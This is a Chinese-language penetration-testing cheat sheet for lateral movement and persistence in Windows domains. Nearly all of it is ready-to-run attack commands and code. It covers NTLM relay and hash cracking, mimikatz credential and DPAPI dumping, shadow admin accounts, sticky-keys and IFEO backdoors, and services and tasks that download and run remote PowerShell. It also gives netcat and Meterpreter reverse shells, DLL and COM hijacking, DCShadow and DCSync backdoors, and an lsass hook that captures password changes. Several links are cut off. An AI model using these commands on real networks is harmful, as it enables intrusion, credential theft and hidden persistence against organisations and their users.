Web漏洞 内网中使用文件包含漏洞和XSS
>Responder -I eth0 -v
http:
http:
中继攻击 修改/etc/responder/Responder.conf文件,配置smb和http为Off,分别开启两个对话框,使用F参数启用WPAD欺骗浏览器,使用/usr/share/responder/tools中的MultiReplay.py进行中继攻击获得目标cmdshell。
> Responder -I eth0 -v -F
> python MultiReplay.py -t 192.168.0.115 -u ALL
NTLMv2Hash破解 使用hashcat破解 -m 5600为NTLMv2类型
>hashcat -m 5600 pass .txt wordlists .txt
GPP-Password 域内机器可访问\\zone .com \SYSVOL \zone .com 共享文件夹,翻看策略文件,查找groups .xml ,ScheduledTasks \ScheduledTasks .xml ,Printers \Printers .xml ,Drives \Drives .xml ,DataSources \DataSources .xml , Services \Services .xml 等文件
使用powersploit脚本解密
使用msf的auxiliary/scanner/smb/smb_enum_gpp模块
WinRM无文件执行 > winrm quickconfig –q启动winrm
或PS>Enable-PSRemoting -Force
生成木马并启动监听
放入已获得权限的机器C盘中 内网另外机器中执行
> net use \\192.168.0.115\c$
> winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c\index.exe" }
添加域管命令 >net user admin$ pass@123 /add /doamin
>net group "Domain admins" admin$ /add /domain
SSH密钥免密登录 >ssh -i id_rsa user @192 .168 .0 .110
获取保存的RDP密码 位置
C:\Users\用户名\AppData\Local\Microsoft\Credentials
查看命令
> cmdkey /list
> mimikatz log
# dpapi::cred /in :C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015
记录guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}
# privilege::debug
# sekurlsa::dpapi
找到GUID为guidMasterKey的值下面的MasterKey: d928f5e02d2e9495f92bb…
# dpapi::cred /in :C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey: d928f5e02d2e9495f92bb…
密码为CredentialBlob值。
后门&持久化 影子用户 > net user test $ test /add
> net localgroup administrators test $ /add
注册表HKEY_LOCAL_MACHINE\SAM\SAM\
给予administrator SAM的完全控制和读取的权限
以下导出为1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$
记录HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$的默认类型000003EA
以下导出为2.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA
默认administrator默认类型为000001F4
以下导出为3.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
把000001F4(3.reg)的F值粘贴到000003EA(2.reg)的F值
修改后导入
> regedit /s 1.reg
> regedit /s 2.reg
删除net user test$ /del
Powershell脚本
https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1
需system权限
> Create-Clone -u 要创建的 -p 密码 -cu 想要克隆的
RID劫持 利用场景:
激活guest修改rid为管理员的
修改低权限用户rid
劫持rid之前普通用户1的rid值
使用msf的post/windows/manage/rid_hijack模块
运行后可以看到已经变为超管的rid值
此时普通用户1登录系统是为超管权限
Guest激活 激活来宾账户,修改其密码,加入administrators组
> net user guest /active:yes
> net user guest 123qwe!@
> net localgroup administrators guest /ad
映像劫持 Sethc >move sethc .exe 1.exe
>copy cmd .exe sethc .exe
5下shift 调用cmd
轻松使用 注册表
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
新建Utilman.exe,新建字符串值Debugger,指定为C:\Windows\System32\cmd.exe
> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
IFEO静默执行 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200
创建:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=muma.exe
DWORD值ReportingMode=1
> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
MSF 添加一个监听
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
查询是否添加成功
Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
开启防火墙进站规则
> netsh firewall add portopening TCP 444 "name" ENABLE ALL
重启
> shutdown -r -t 0
CMD 查看注册表启动项
> REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
添加启动项
> REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"
删除启动项
> REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f
计划任务 加载powershell > schtasks /Create /tn 名字 /tr 运行程序 /sc hourly /mo 1
> schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"
执行exe 创建计划任务
> schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM
查看计划任务
> schtasks /query | findstr "windowsupdate"
立即执行某项计划任务
> schtasks /run /tn "windowsupdate"
删除某项计划任务
> schtasks /delete /F /tn "windowsupdate"
普通用户权限计划任务
> schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25
> schtasks /query | findstr "windowsupdate"
> schtasks /run /tn "windowsupdate"
> schtasks /delete /F /tn "windowsupdate"
> schtasks /tn "SysDebug" /query /fo list /v
进程注入 AppCertDlls 注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项
# msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dll
Msf> use exploit/multi/handler
Msf> set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
> RemoteDLLInjector64.exe PID c:\1.dll
AppInit_DLLs 注册表HKEY_LOCAL_MACHINE \Software \Microsoft \WindowsNT \CurrentVersion \Window \Appinit_Dlls 下AppInit_DLLs 设置为c :\1.dll ,LoadAppInit_DLLs 设置为1
MSF Msf> use post/windows/manage/reflective_dll_inject
Msf> set session 1
Msf> set pid 1234
Msf> set path c:\\1.dll
Msf> run
&
migrate +pid
&
Meterpreter> run post/windows/manage/migrate
登录初始化 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
计算机\HKEY_CURRENT_USER\Environment
创建键值UserInitMprLogonScript值为c:\muma.exe
&
Powershell实现:
>Set-ExecutionPolicy RemoteSigned
保存ps1执行
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w =new-object net.webclient;$w .proxy=[Net.WebRequest]::GetSystemWebProxy();$w .Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w .downloadstring('http://192.168.2.11:8080/kaMhC1');"
屏幕保护程序 计算机\HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE - 默认屏幕保护程序,改为恶意程序(设置备份)
ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态
ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)
MOF > git clone https://github.com/khr0x40sh/metasploit-modules.git
> mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/
> reload_all
> use post/windows/mof_ps_persist
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost 192.168.0.108
> set lport 12345
> set session 1
> run
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost 192.168.0.108
> set lport 12345
> set exitonsession false
重启后还会上线
清除后门,进入meterpreter,resource 生成的rc文件
停止MOF
> net stop winmgmt
删除文件夹:C:\WINDOWS\system32\wbem\Repository\
> net start winmgmt
WinRM端口复用 WinRM端口5985,win2012以上默认启动,2008开启命令
> winrm quickconfig -q
2012启用端口复用
> winrm set winrm/config/service @{EnableCompatibilityHttpListener="true" }
2008启用WinRM后修改端口为80
> winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80" }
后门连接和使用
本地开启WinRM并设置信任连接主机
> winrm quickconfig -q
> winrm set winrm/config/Client @{TrustedHosts="*" }
执行命令
> winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all
获取cmdshell
> winrs -r:http://10.1.1.100 -u:administrator -p:password cmd
只administrator允许远程登录WinRM,允许其他用户可以登录,执行注册表
> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
创建服务 重启维持nc
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore
重启维持psh
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \" IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1' )\"" start= delayed-auto error= ignore
重启维持Cobalt strike 配置监听器,生成web传递模块Powershell脚本
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \" IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a' ))\"" start= delayed-auto error= ignore
Delay执行大概2分钟上线
> sc delete ms 卸载服务
Powershell
> powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic
> $c2 ='new-' ;$c3 ='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic' ; $Text =$c2 +$c3 ;IEX(-join $Text )
Bitadmin 创建下载任务
> bitsadmin /create empire
下载的文件设置
> bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe
设置传输时运行的命令,MSFvenom生成dll放入temp目录
> bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"
(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")
启动任务
> bitsadmin /resume empire
列出所有用户的下载任务
> bitsadmin /list /allusers /verbose
重启后也会上线
完成任务
> bitsadmin /complete empire
> bitsadmin /cancel <Job> //删除某个任务
> bitsadmin /reset /allusers //删除所有任务
&
> bitsadmin /create mission
> bitsadmin /addfile mission %comspec% %temp%\cmd.exe
> bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll"
> bitsadmin /Resume mission
CLR Injection 劫持调用.net程序,开机启动
WMIC可替换为powershell
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value " 1 " -propertyType string | Out-Null
New-ItemProperty " HKCU:\Environment\" COR_PROFILER -value " {11111111 -1111 -1111 -1111 -111111111111 }" -propertyType string | Out-Null
wmic ENVIRONMENT create name=" COR_ENABLE_PROFILING",username=" %username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER" ,username="%username%",VariableValue=" {11111111 -1111 -1111 -1111 -111111111111 }"
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D " %CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D " %CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
添加全局变量
计算机\HKEY_CURRENT_USER\Environment
COR_ENABLE_PROFILING=1
COR_PROFILER={11111111-1111-1111-1111-111111111111}
注册CLSID
计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32
新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径
劫持explorer.exe
>SET COR_ENABLE_PROFILING=1
>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}
位置(新建)
HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL
新建ThreadingModel值为Apartment
COM OBJECT hijacking CAccPropServicesClass and MMDeviceEnumerato
无需超管权限,无需重启
https:
将恶意DLLbase64编码写入ps脚本
执行后会在
% appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}目录释放2个文件,分别是x86和x64的dll
会在注册表中
HKEY_CURRENT_USER\Software\Classes\CLSID\
新建
{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}和子项默认指向恶意DLL
只要指向.net程序便可上线。如ie,mmc等
Explorer 注册表位置:HKCU\Software\Classes\CLSID\
创建项{42 aedc87-2188 -41f d-b9a3-0 c966feabec1}
创建子项InprocServer32
Default的键值为恶意dll的绝对路径:C:\test\1.d ll
创建键值: ThreadingModel REG_SZ Apartment
HKCU\Software\Classes\CLSID {42 aedc87-2188 -41 fd-b9a3-0 c966feabec1}
HKCU\Software\Classes\CLSID {fbeb8a05-beee-4442 -804e-409 d6c4515e9}
HKCU\Software\Classes\CLSID {b5f8350b-0548 -48 b1-a6ee-88 bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID {BCDE0395-E52F-467 C-8E3 D-C4579291692E}
Squibledoo 创建1.sct
<?XML version="1.0"?>
<scriptlet >
<registration
description ="Component"
progid ="Component.WindowsUpdate"
version ="1.00"
classid ="{20002222-0000-0000-0000-000000000002}"
>
</registration >
<public >
<method name ="exec" >
</method >
</public >
<script language ="JScript" >
<![CDATA[
function exec(){
new ActiveXObject('WScript.Shell').Run('calc.exe');
}
]]>
</script >
</scriptlet >
创建COM对象
>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll
触发
>cscript 1.js
var test = new ActiveXObject("Component.TESTCB");
test.exec()
DLL劫持 劫持1 注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls下添加 "lpk.dll" (若无,自己创建)
ExcludeFromKnownDlls可使KnownDLLs失效
需要重新启动电脑
查找可劫持的DLL:
1 .启动程序
2 .使用Process Explorer查看该应用程序启动后加载的DLL。
3 .从已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
4 .编写第三步中获取到的DLL的劫持DLL。
5 .将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。
Explorer.exe启动调用winrar文件夹的RarExt.dll Msf监听
复制dll 文件到the-backdoor-factory 文件夹中,加载恶意dll 进原dll
>python backdoor .py -f RarExt .dll -s reverse_shell_tcp_inline -P 12138 -H 192.168 .0 .107 指定为kali 监听的IP 和端口
生成好的dll在backdoored文件夹,传入靶机中,替换原dll文件,最好把原dll保存备份。
每次打开windows资源管理器的时候,即可上线。重启可维持
劫持2 使用
https:
https:
查看要劫持的DLL的函数导出表,会直接生成cpp源码,重编译指向恶意代码
DLLHijack_Detecter可查看程序加载的不在KnownDLLs中的DLL
MSDTC服务劫持 服务名称MSDTC,显示名称Distributed Transaction Coordinator
对应进程msdtc.exe,位于%windir%system32
C :\Windows\System32\wbem\
服务启动搜索注册表位置计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI
Oci.dll放入c :\windows\system32\
重启服务即可
>taskkill /f /im msdtc.exe
Rattler 自动化查找可劫持的DLL
https:
使用
>Rattler_x64.exe calc.exe 1
会列出可被劫持的DLL
按程序读取DLL位置顺序,把恶意DLL放入程序同目录后,执行程序即可。
DLL代理劫持右键 右键对应的注册表路径是
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers
使用autoruns查看加载的DLL
以rarext.dll为例 使用https://github.com/rek7/dll-hijacking创建代理DLL 注意修改parse.py中dumpbin.exe的位置
>python3 parse.py -d rarext.dll
修改原DLL为rarext_.dll,重新生成解决方案命名为rarext.dll 将两个DLL放入原目录,重启
DLL劫持计划任务 function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True , ConfirmImpact = 'Medium' )]
Param (
[Parameter(Mandatory = $True )]
[ValidateNotNullOrEmpty()]
[String]
$Command ,
[Switch]
$Force
)
$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null )){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else {
Write-Verbose "Key already exists, consider using -Force"
exit
}
if (Test-Path $ScheduledTaskCommandPath ) {
Write-Verbose "Created registry entries to hijack the UserTask"
}else {
Write-Warning "Failed to create registry key, exiting"
exit
}
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
重启权限可维持
DLL注入 Powershell 生成DLL
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"
InjectProc 生成DLL
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll
# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
使用如下命令注入进程
> InjectProc.exe dll_inj qq.dll xx.exe(存在的进程)
通过控制面板加载项维持权限
添加到注册表中,只要运行control命令打开控制面板即可加载dll
编译为dll,这里是弹框测试
#include <Windows.h>
#include "pch.h"
extern "C" __declspec(dllexport) LONG Cplapplet (
HWND hwndCpl,
UINT msg,
LPARAM lParam1,
LPARAM lParam2
)
{
MessageBoxA(NULL , "inject control panel." , "Control Panel" , 0 );
return 1 ;
}
BOOL APIENTRY DllMain (HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
Cplapplet(NULL , NULL , NULL , NULL );
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break ;
}
return TRUE;
}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f
通过自定义.net垃圾回收机制进行DLL注入 低权限用户可指定.net应用程序使用自定义垃圾收集器(GC),一个自定义GC可以以COMPLUS_GCName此环境变量指定,只需将此环境变量指向到恶意DLL,自定义GC的DLL需要一个名为GC_VersionInfo的导出表。 下面是个弹框DLL
#include <Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break ;
}
return TRUE ;
}
struct VersionInfo
{
UINT32 MajorVersion;
UINT32 MinorVersion;
UINT32 BuildVersion;
const char * Name;
};
extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info)
{
info->BuildVersion = 0 ;
info->MinorVersion = 0 ;
info->BuildVersion = 0 ;
MessageBoxA(NULL , "giao" , "giao" , 0 );
}
后执行任意.net程序可加载此DLL
当然也可以加载shellcode
Windows FAX DLL Injection 恶意DLL 改名为fxsst .dll 放置在c :\windows \目录即可实现对explorer .exe 的劫持
DSRM+注册表ACL后门 > reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
允许DSRM账户远程访问
https://github.com/HarmJ0y/DAMP
效果:域内任何用户可读取域控hash
system权限执行
> psexec.exe -accepteula -s -i -d cmd.exe
域控制器执行
PS> Add-RemoteRegBackdoor -ComputerName 域控名 -Trustee 'S-1-1-0' –Verbose
域内机器执行
https:
PS> Get-RemoteLocalAccountHash -ComputerName 域控 –Verbose
域控上执行
> reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
PTH攻击,mimikatz需以管理员身份启动
> mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit
DCShadow&SID History http://192.168.0.107/ps/nishang/ActiveDirectory/Set -DCShadowPermissions.ps1
DCShadow攻击是通过更改AD架构,使域内一台机器伪造成域控。
此脚本可以通过修改AD对象提供DCShadow攻击的最小权限。
运行此脚本需要DA(Domain Administrator)权限,可以使指定用户不需要DA权限使用mimikatz。
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域控执行
>Set -DCShadowPermissions -Fakedc sub2k8 -Object dc -username y –Verbose
注册sub2k8为假DC,给予用户y从sub2k8修改dc的计算机对象的权限。
在sub2k8上,以本地system 权限启动一个mimikatz会话,以zone\y 权限启动一个mimikatz会话。
System权限窗口执行dcshadow攻击,修改dc的计算机属性 Zone\y权限窗口用于推送 添加域管理 通过修改安全标识符,将域内普通用户y提升为域管理用户
> lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512
Zone\y推送 >lsadump::dcshadow /push
此时在域控上查询可见y用户已经加入域管理组。
添加SIDHistory后门 记录域管理SID
>Set -DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose
> lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500
推送
> lsadump::dcshadow /push
测试
域控中通过mimikatz命令可查询到SIDHistory
删除SIDHistory的方法
PS>Get-ADUser -Filter {name -eq "y" } –Properties sidhistory|foreach {Set-ADuser $_ –remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500" }}
删除功能规则 输入的规则后面加参数-remove即可。
DCSync后门 服务器管理器找到域->查看->启用高级功能->右键属性->安全->everyone完全控制
> mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit
或使用powerview添加一条ACL(域控执行)
> Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity 域内用户 -Rights DCSync -Verbose
使用此账户在域内任意主机可使用mimikatz的dcsync功能导出凭据
移除ACL
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity 用户 -Rights DCSync -Verbose
Netsh Helper DLL
https:
https:
MSFvenom生成DLL 生成DLL格式木马
传至靶机执行命令 >netsh add helper C:\Windows\Temp\help.dll
MSF+web_delivery 关闭netsh权限不会掉,调用的powershell
# use exploit/multi/script/web_delivery
> set target 2
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost 192.168.0.107
> set lport 12345
Visual Studio新建空白DLL项目,源文件添加现有文件
https: //github.com/rtcrowley /Offensive-Netsh-Helper/blob /master/netshlep .cpp
复制生成的代码进文件中,配置管理器新建x64位数后生成解决方案,配置类型选择位动态库复制DLL到靶机执行
>netsh add helper helper.dll
MSF&Shellcode 关闭netsh后权限会掉
https:
MSFvenom 生成.c 格式
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST =192.168 .0.107 LPORT =12345 -f c -o /var /www/html/1 .c
Visual Studio 打开项目
若系统是64 位需设置配置管理器为64 位项目,反之32 (解决方案右键属性)
将MSF生成shellcode粘贴进相应位置后生成解决方案。
会在项目目录x64/Release下生成dll 复制DLL到靶机system32目录下,执行命令
> netsh add helper C:\Windows\System32\NetshHelperBeacon.dll
只要启动netsh就会触发
MSSQL后门 注册表自启动
> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance " zone.com\sub2k8""
重启MSSQL上线(需重启服务)
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
> powershell -ep bypass
> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1' )
> Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马脚本可用CS/Empire生成
> net stop mssqlserver
> net start mssqlserver
映像劫持
> powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command " c:\windows\system32\cmd.exe" -Instance " zone.com\sub2k8""
DDL事件触发
> powershell -exec bypass
> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1' )
> Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马文件可用CS/Empire生成
> Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove 移除后门
NSSM http:
NSSM 封装可执行程序为系统服务
>nssm install 服务名称会自动弹出设置
Path选择powershell的路径,arguments直接输入参数。 启动服务
会上线
重启电脑,权限也会维持 删除服务
> nssm remove <servicename>
添加签名 https://github.com/secretsquirrel/SigThief
> python sigthief.py -i 被窃取的文件 -t 要添加签名的恶意文件 -o 保存文件
> python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll
Metsvc Meterpreter> run metsvc -A
在C:Windows\TEMP下随机生成目录三个文件,创建服务metsvc 31337端口
连接后门
Msf> use exploit/multi/handler
Msf> set payload windows/metsvc_bind_tcp
Msf> set rhost 192.168.1.2
Msf> set rport 31337
Msf> run
删除服务
Meterpreter > run metsvc –r
Persistence Meterpreter> run persistence -X -i 10 -r 192.168.1.9 -p 4444
-X系统启动时运行
-i每隔10秒尝试连接服务端
连接后门
Msf> use exploit/multi/handler
Msf> set payload windows/meterpreter/reverse_tcp
Msf> set lhost 192.168.1.1
Msf> set lport 4444
Msf> run
HookPasswordChangeNotify 使用VS2015开发环境,MFC设置为在静态库中使用MFC
编译工程,生成HookPasswordChange.dll
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
在代码尾部添加如下代码:
>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
并命名为HookPasswordChangeNotify.ps1
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll
管理员权限执行
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
C:\Windows\Temp下可以找到passwords.txt
&
https://gitee.com/RichChigga/PasswordchangeNotify
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理员权限执行:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
